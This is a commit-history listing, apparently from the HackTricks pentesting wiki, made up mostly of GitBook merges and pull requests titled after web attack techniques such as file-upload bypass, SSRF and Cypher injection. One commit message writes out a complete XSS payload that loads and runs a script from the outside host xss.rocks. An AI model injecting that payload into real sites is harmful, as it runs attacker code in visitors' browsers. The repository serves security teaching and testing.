Commit graph

1031 commits

Author SHA1 Message Date
CPol
28e205b34c
GITBOOK-3949: change request with no subject merged in GitBook 2023-05-26 15:11:27 +00:00
CPol
c6842d3ff8
GITBOOK-3947: change request with no subject merged in GitBook 2023-05-26 11:10:05 +00:00
carlospolop
fdf9afee4e hacking career 2023-05-26 11:43:15 +02:00
Carlos Polop
cdcae14a54
Merge pull request #635 from bl13pbl03p/patch-1
Completed payload
2023-05-26 11:40:54 +02:00
Carlos Polop
8c3ad1340e
Merge pull request #646 from anoduck/patch-1
Update cross-site-websocket-hijacking-cswsh.md
2023-05-26 11:38:04 +02:00
Carlos Polop
63f93aedc6
Merge pull request #639 from Eferus/master
Reorganize Domain Confusion list in SSRF
2023-05-26 11:34:46 +02:00
Carlos Polop
65554df230
Merge pull request #637 from mdprain/mdprain-csrf-fix
Add missing HTML form methods for POST exploits
2023-05-26 11:31:07 +02:00
Carlos Polop
4b36725f03
Merge pull request #636 from syselement/patch-1
Update README.md - SQLMap CheatSheet
2023-05-26 11:30:39 +02:00
Carlos Polop
b2fcc5d7a1
Merge pull request #632 from TomF0x/patch-1
Update cypher-injection-neo4j.md
2023-05-26 11:29:11 +02:00
Carlos Polop
efccd3f03f
Merge pull request #631 from NaxnN/patch-2
fix a missing space in a cypher-injection payload
2023-05-26 11:28:45 +02:00
CPol
149284a747
GITBOOK-3943: change request with no subject merged in GitBook 2023-05-24 22:31:58 +00:00
Anoduck
2ab2af5bcb
Update cross-site-websocket-hijacking-cswsh.md
Corrected typos on line 81 and 82
2023-05-20 09:28:25 +00:00
CPol
419be89fe7
GITBOOK-3933: change request with no subject merged in GitBook 2023-05-18 12:13:32 +00:00
CPol
b212998555
GITBOOK-3915: change request with no subject merged in GitBook 2023-05-12 14:33:51 +00:00
CPol
5a46a7c396
GITBOOK-3907: change request with no subject merged in GitBook 2023-05-10 14:04:00 +00:00
CPol
2fafcfd659
GITBOOK-3903: change request with no subject merged in GitBook 2023-05-09 16:45:28 +00:00
CPol
f2762b0fb2
GITBOOK-3896: change request with no subject merged in GitBook 2023-05-08 09:41:51 +00:00
Eferus
a3d91ce362
Reorganize Domain Confusion list in SSRF
* Remove duplicates
* Add payloads
2023-05-06 04:28:16 +02:00
Matthew Prain
ac9e066bb6
Add missing HTML form methods for POST exploits
"Form POST request" and "Form POST request through iframe" now have the correct POST method.
2023-05-05 10:24:18 +10:00
CPol
c469ce05ac
GITBOOK-3892: change request with no subject merged in GitBook 2023-05-04 23:22:39 +00:00
syselement
3ed41d5e00
Update README.md - SQLMap CheatSheet 2023-05-04 19:19:54 +02:00
bl13bl03p
4916da0f6e
Completed payload
Location: Line 896
Change: Added > to complete payload

`<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">`
2023-05-03 19:27:46 +02:00
CPol
504234542f
GITBOOK-3885: change request with no subject merged in GitBook 2023-04-30 22:29:45 +00:00
CPol
ecd03d0108
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00
CPol
98facb9725
GITBOOK-3883: change request with no subject merged in GitBook 2023-04-30 21:23:47 +00:00
TomFox
86fd85255e
Update cypher-injection-neo4j.md 2023-04-27 12:03:10 +02:00
KeoOp
f034eb35f1
fix a missing space in a cypher-injection payload
fix a missing space in url in cypher-injection-neo4j.md
2023-04-27 11:24:52 +08:00
Carlos Polop
e36ebc6dee
Merge pull request #616 from fssecur3/patch-1
Add special character to bypass file upload restrictions
2023-04-26 15:52:36 +02:00
carlospolop
5ec5b67e79 update twitter 2023-04-25 20:35:28 +02:00
CPol
34c27bc4e1
GITBOOK-3879: change request with no subject merged in GitBook 2023-04-18 23:46:39 +00:00
Francisco Spínola
0aefd22b53
Add special character to bypass file upload restrictions 2023-04-11 14:20:39 +01:00
CPol
b5069b5f86
GITBOOK-3870: change request with no subject merged in GitBook 2023-04-11 01:00:47 +00:00
Francisco Spínola
6a7fb5e4f4
Add special character to bypass file upload restrictions 2023-04-10 17:55:08 +01:00
carlospolop
286ea6a24c hacktricks cloud 2023-04-07 10:52:01 +02:00
CPol
cc9b5b1abb
GITBOOK-3867: change request with no subject merged in GitBook 2023-04-06 15:39:43 +00:00
CPol
6046750cc2
GITBOOK-3866: change request with no subject merged in GitBook 2023-04-06 10:05:52 +00:00
CPol
608d71d4a6
GITBOOK-3864: change request with no subject merged in GitBook 2023-04-05 23:11:20 +00:00
carlospolop
2197a2102f f 2023-04-05 17:19:27 +02:00
CPol
c3d99d5e4f
GITBOOK-3863: change request with no subject merged in GitBook 2023-04-05 15:16:57 +00:00
carlospolop
1fa9f77ec3 change 2023-04-05 14:02:54 +02:00
OxNinja
fbb21ead23
Fix wfuzz typos
Fixed some minor typos at /pentesting-web/web-tool-wfuzz.md
2023-03-31 13:56:52 +02:00
CPol
9687d27a38
GITBOOK-3851: change request with no subject merged in GitBook 2023-03-30 22:05:38 +00:00
CPol
221c5f2ad6
GITBOOK-3846: change request with no subject merged in GitBook 2023-03-29 15:51:50 +00:00
CPol
b68d444c7e
GITBOOK-3842: change request with no subject merged in GitBook 2023-03-28 22:07:13 +00:00
CPol
4e9432ed74
GITBOOK-3840: change request with no subject merged in GitBook 2023-03-28 17:50:22 +00:00
CPol
bfb02053d9
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
CPol
dee4c5fa4e
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Carlos Polop
8a22e8590c
Merge pull request #611 from blacklanternsecurity/badsecrets
Badsecrets
2023-03-27 11:42:50 +02:00
Carlos Polop
b54069ccaf
Merge pull request #610 from Swiftrix/Swiftrix-patch-1
Update prototype-pollution-to-rce.md
2023-03-27 11:41:01 +02:00
Carlos Polop
57a6a58b47
Merge pull request #606 from blacklanternsecurity/master
BBOT for bucket enumeration, subdomain takeover
2023-03-27 11:38:20 +02:00
Carlos Polop
9c58a361bd
Merge pull request #604 from petersandor/fix/typo-beginning
fix: typos
2023-03-27 11:36:43 +02:00
liquidsec
2f41f6baba typo fix 2023-03-25 12:47:16 -04:00
liquidsec
15756038b3 small language adjustment 2023-03-24 17:55:50 -04:00
liquidsec
d7eb3427c4 adding references to badsecrets 2023-03-24 17:40:35 -04:00
Swiftrix
ee145f556a
Update prototype-pollution-to-rce.md 2023-03-24 16:40:07 +00:00
CPol
eeeeb2fb0a
GITBOOK-3834: No subject 2023-03-23 15:12:27 +00:00
CPol
cb84a845ff
GITBOOK-3832: No subject 2023-03-23 14:15:27 +00:00
CPol
a8258ea313
GITBOOK-3830: No subject 2023-03-23 14:03:29 +00:00
CPol
f1728eac7d
GITBOOK-3829: No subject 2023-03-23 12:54:51 +00:00
CPol
ceb09f11fe
GITBOOK-3828: No subject 2023-03-23 12:48:36 +00:00
TheTechromancer
0db8cb0492 BBOT for bucket enumeration, subdomain takeover 2023-03-21 17:10:11 -04:00
CPol
3caaafe0b0
GITBOOK-3826: No subject 2023-03-20 09:22:01 +00:00
Peter Šándor
92d821c204
fix: typos 2023-03-19 19:16:17 +01:00
CPol
0350723c81
GITBOOK-3824: No subject 2023-03-15 09:29:52 +00:00
CPol
3af1f60237
GITBOOK-3823: No subject 2023-03-14 23:16:58 +00:00
CPol
6b22eab3d2
GITBOOK-3820: No subject 2023-03-12 18:00:45 +00:00
dxbstyle
0bc3981364
Typo
flile.phpJunk123png -> file.phpJunk123png
2023-03-11 20:44:03 +01:00
CPol
94e9127a8d
GITBOOK-3819: No subject 2023-03-05 23:41:46 +00:00
carlospolop
f0e09e3f54 social 2023-03-06 00:16:20 +01:00
carlospolop
9e5102b4c0 social 2023-03-06 00:15:43 +01:00
CPol
bb1f6e0b75
GITBOOK-3817: No subject 2023-03-05 22:20:47 +00:00
carlospolop
89016342d8 f 2023-03-05 22:38:33 +01:00
carlospolop
bee65ef8c6 twit 2023-03-05 20:58:55 +01:00
CPol
675802d483
GITBOOK-3816: No subject 2023-03-05 19:54:13 +00:00
carlospolop
d0476b922d d 2023-03-05 19:35:39 +01:00
CPol
a6c260e567
GITBOOK-3814: No subject 2023-03-05 18:28:55 +00:00
carlospolop
77801de4cf fix 2023-03-05 19:27:55 +01:00
CPol
a67c417bb8
GITBOOK-3813: No subject 2023-03-05 18:12:38 +00:00
CPol
df3103dbf8
GITBOOK-3812: No subject 2023-03-05 15:13:44 +00:00
CPol
7bfac801c5
GITBOOK-3809: No subject 2023-03-05 10:15:19 +00:00
Carlos Polop
19bc061f46
Merge pull request #594 from maxence-Doyensec/FileUploadUWSGI
file upload to RCE using uwsgi.ini
2023-03-05 11:06:08 +01:00
Carlos Polop
5ad193d1b8
Merge pull request #592 from FreeZeroDays/master
Fixing Cache Deception Typo
2023-03-05 10:59:00 +01:00
CPol
3a122edb7d
GITBOOK-3806: No subject 2023-03-04 19:33:37 +00:00
CPol
fb8562b7c0
GITBOOK-3805: No subject 2023-03-04 19:17:01 +00:00
CPol
595f9f77db
GITBOOK-3804: No subject 2023-03-03 17:26:17 +00:00
CPol
f8a5c782d0
GITBOOK-3803: No subject 2023-03-03 16:32:17 +00:00
CPol
2d8221606b
GITBOOK-3802: No subject 2023-03-03 16:14:19 +00:00
CPol
72062e8323
GITBOOK-3801: No subject 2023-03-03 15:56:05 +00:00
CPol
0d24e9705b
GITBOOK-3800: No subject 2023-03-03 15:39:23 +00:00
CPol
ac9c37e960
GITBOOK-3799: No subject 2023-03-03 00:11:57 +00:00
CPol
549fae7260
GITBOOK-3798: No subject 2023-03-02 18:08:43 +00:00
Maxence Schmitt
f38b063a3d file upload to RCE using uwsgi.ini 2023-03-02 10:08:19 +01:00
CPol
4ced3c152d
GITBOOK-3796: No subject 2023-03-01 10:14:57 +00:00
parzival
7d4d854a2e
Fixing Cache Deception Typo
Fixing a small typo as it confused my understanding while revising Web Cache Deception attacks. Namely, where an attacker would observe the sensitive cached information after social engineering a user.
2023-02-28 22:11:38 -08:00
CPol
b399cad65f
GITBOOK-3794: No subject 2023-02-27 18:21:24 +00:00
carlospolop
efa1552937 link 2023-02-27 11:02:29 +01:00
carlospolop
3edf173026 hp 2023-02-27 10:54:26 +01:00
carlospolop
4f3092e61d hp 2023-02-27 10:28:45 +01:00
CPol
da094e016f
GITBOOK-3792: No subject 2023-02-23 14:32:10 +00:00
CPol
c1cccba14b
GITBOOK-3791: No subject 2023-02-20 18:01:10 +00:00